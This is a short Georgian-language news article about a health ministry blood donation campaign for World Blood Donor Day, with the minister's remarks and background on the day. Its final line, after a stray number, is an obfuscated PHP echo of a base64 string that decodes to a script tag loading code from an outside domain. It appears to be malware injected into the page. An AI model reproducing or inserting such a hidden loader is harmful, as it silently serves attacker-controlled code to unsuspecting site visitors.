celsiusi
ავერსი საქკაბელი

 14 ივნისი სისხლის დონორის მსოფლიო დღეა. თარიღთან დაკავშირებით, ჯანდაცვის სამინისტროს ინიციატივით, უანგარო დონაციის აქცია გაიმართა. აქციის მიზანი უსაფრთხო სისხლისა და სისხლის პროდუქტების მნიშვნელობასა და საჭიროებაზე საზოგადოების ცნობიერების ამაღლება. ასევე - უანგარო, რეგულარული დონორების მნიშვნელოვანი როლის წარმოჩენა და მათ მიმართ მადლიერების გამოხატვა.

სისხლის დონაცია, სამინისტროსა და მის დაქვემდებარებულ უწყებებში, 5 სხვადასხვა ლოკაციაზე, ერთდროულად მიმდინარეობს. კამპანიაში ჯანდაცვის მინისტრი და მისი მოადგილეებიც ჩაერთნენ. მიხეილ სარჯველაძემ, სისხლის პროდუქტების მნიშვნელობასა და საჭიროებაზე გაამახვილა ყურადღება. მინისტრის განცხადებით უანგარო დონაცია ერთ-ერთი ყველაზე ეფექტური მხარდაჭერა სიცოცხლის გადასარჩენად, ვინაიდან სისხლის გაღებით ერთ ადამიანს, 3 ადამიანის სიცოცხლის გადარჩენა შეუძლია.

აღსანიშნავია, რომ სისხლის პროდუქტების მიღების ერთადერთი გზა სისხლის დონაციაა.

სისხლის დონორის მსოფლიო დღე, ჯანმრთელობის მსოფლიო ორგანიზაციამ, 2004 წელს დაარსდა და იგი ყოველწლიურად, 14 ივნისს აღინიშნება. მე-20 საიუბილეო წელს, ამ დღესთან დაკავშირებული კამპანიების სლოგანია „მადლობა სისხლის დონორებს!

146
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");